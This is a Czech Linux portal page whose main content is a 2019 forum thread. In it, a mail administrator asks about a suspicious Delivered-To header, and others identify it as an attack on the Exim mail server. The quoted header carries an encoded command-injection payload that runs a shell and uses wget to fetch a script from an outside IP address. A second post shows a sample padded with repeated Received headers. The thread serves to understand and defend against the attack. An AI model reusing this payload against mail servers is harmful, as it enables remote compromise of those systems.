Přihlášení | Registrace

napište » Zprávičky

dnes 01:22 | Nová verze

Byla vydána (𝕏) zářijová aktualizace aneb nová verze 1.105 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a videi v poznámkách k vydání. Ve verzi 1.105 vyjde také VSCodium, tj. komunitní sestavení Visual Studia Code bez telemetrie a licenčních podmínek Microsoftu.

Ladislav Hagara | Komentářů: 0

Lepší správa profilů ve Firefoxu

včera 15:33 | Komunita

Ve Firefoxu bude lepší správa profilů (oddělené nastavení domovské stránky, nastavení lišt, instalace rozšíření, uložení hesla, přidání záložky atd.). Nový grafický správce profilů bude postupně zaváděn od 14.října.

Ladislav Hagara | Komentářů: 0

Ubuntu 25.10 Questing Quokka

včera 12:44 | Nová verze

Canonical vydal (email) Ubuntu 25.10 Questing Quokka. Přehled novinek v poznámkách k vydání. Jedná se o průběžné vydání s podporou 9 měsíců, tj. do července 2026.

Ladislav Hagara | Komentářů: 0

ClamAV 1.5.0

včera 12:22 | Nová verze

ClamAV (Wikipedie), tj. multiplatformní antivirový engine s otevřeným zdrojovým kódem pro detekci trojských koní, virů, malwaru a dalších škodlivých hrozeb, byl vydán ve verzi 1.5.0.

Ladislav Hagara | Komentářů: 0

Julia 1.12.0

včera 01:22 | Nová verze

Byla vydána nová verze 1.12.0 dynamického programovacího jazyka Julia (Wikipedie) určeného zejména pro vědecké výpočty. Přehled novinek v příspěvku na blogu a v poznámkách k vydání. Aktualizována byla také dokumentace.

Ladislav Hagara | Komentářů: 0

Kritická zranitelnost CVE-2025-49844 v Redisu

8.10. 15:11 | Bezpečnostní upozornění

V Redisu byla nalezena a v upstreamu již opravena kritická zranitelnost CVE-2025-49844 s CVSS 10.0 (RCE, vzdálené spouštění kódu).

Ladislav Hagara | Komentářů: 5

Ministr Jurečka přijal rezignaci ředitele DIA Martina Mesršmída

8.10. 14:00 | IT novinky

Ministr a vicepremiér pro digitalizaci Marian Jurečka dnes oznámil, že přijme rezignaci ředitele Digitální a informační agentury Martina Mesršmída, a to k 23. říjnu 2025. Mesršmíd nabídl svou funkci během minulého víkendu, kdy se DIA potýkala s problémy eDokladů, které některým občanům znepříjemnily využití možnosti prokázat se digitální občankou u volebních komisí při volbách do Poslanecké sněmovny.

Ladislav Hagara | Komentářů: 18

OpenZL, open source framework pro kompresi dat s ohledem na jejich formát

8.10. 12:33 | Zajímavý software

Společnost Meta představila OpenZL. Jedná se o open source framework pro kompresi dat s ohledem na jejich formát. Zdrojové kódy jsou k dispozici na GitHubu.

Ladislav Hagara | Komentářů: 0

Google zpřístupňuje českým uživatelům Režim AI (AI Mode)

8.10. 03:33 | IT novinky

Google postupně zpřístupňuje českým uživatelům Režim AI (AI Mode), tj. nový režim vyhledávání založený na umělé inteligenci. Režim AI nabízí pokročilé uvažování, multimodalitu a možnost prozkoumat jakékoliv téma do hloubky pomocí dodatečných dotazů a užitečných odkazů na weby.

Ladislav Hagara | Komentářů: 0

Python 3.14.0

7.10. 18:11 | Nová verze

Programovací jazyk Python byl vydán v nové major verzi 3.14.0. Podrobný přehled novinek v aktualizované dokumentaci.

Ladislav Hagara | Komentářů: 2

Centrum | Napsat | Starší

navrhněte » Anketa

Jaké řešení používáte k vývoji / práci?

Github (38%)

Gitlab (46%)

Atlassian (15%)

Bitbucket (17%)

Gitea (21%)

Mercurial (15%)

jen git (17%)

jen svn (15%)

Jiné (uvedu v diskusi) (15%)

Celkem 203 hlasů

Komentářů: 13, poslední 8.10. 07:41

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Mail attack

Štítky: doména, mail, skript, stahování, wget

Dotaz: Mail attack

11.7.2019 19:51 alkoholik | skóre: 40 | blog: Alkoholik
Mail attack

Přečteno: 572×

Odpovědět | Admin

Obcas mi prijde email adresovany velice zvlastnim zpusobem. V Delivered-To je neco jako:


root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f10.20.30.40x22}}@moje.domena

Je jasne, ze by se mel nekde pustit skript stazeny pres wget. Nemate nekdo tuseni, co presne se snazi prostrelit?
Misto 10.20.30.40 bylo moje skutecne ip a domenu jsem taky zmenil.

Řešení dotazu:

Komentář #3 (Jendа, 1 hlasů)

Nástroje: Začni sledovat (1) ?

Odpovědi

11.7.2019 20:19 Pavel 'TIGER' Růžička | skóre: 54
Rozbalit Rozbalit vše Re: Mail attack

Vypadá to na novější "aktualizovanou verzi" pro získání údajů nad kontrolou domény.

11.7.2019 22:33 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack

Me spis zajima, ktery mail daemon/klient by jako mel mit ten super napad, ze pusti shell s wgetem. Exim? Postfix? Procmail? Nejaky soft na analyzovani logu?

Řešení 1× (alkoholik (tazatel))

12.7.2019 02:56 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Mail attack

Exim. Všimni si, že (minimálně v exempláři který přišel mně) je tam hromada Received: hlaviček.

12.7.2019 08:41 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack

Jo, muj vypada skoro stejne.

12.7.2019 13:53 madmucho
Rozbalit Rozbalit vše Re: Mail attack

Vypadá to že to pouští patrně i filtr amavisu , našel jsem toto na svém serveru také,

neco to stahuje nedotahne, poslal mi to postfix jako že padlo na špatné hlavičky do karantény.

Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
Message-Id: <20190711125952.3895A9F13B@bla bla>
Date: Thu, 11 Jul 2019 14:59:52 +0200 (CEST)
From: root@sab.com

Založit nové vlákno • Nahoru

Tiskni Sdílej:

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje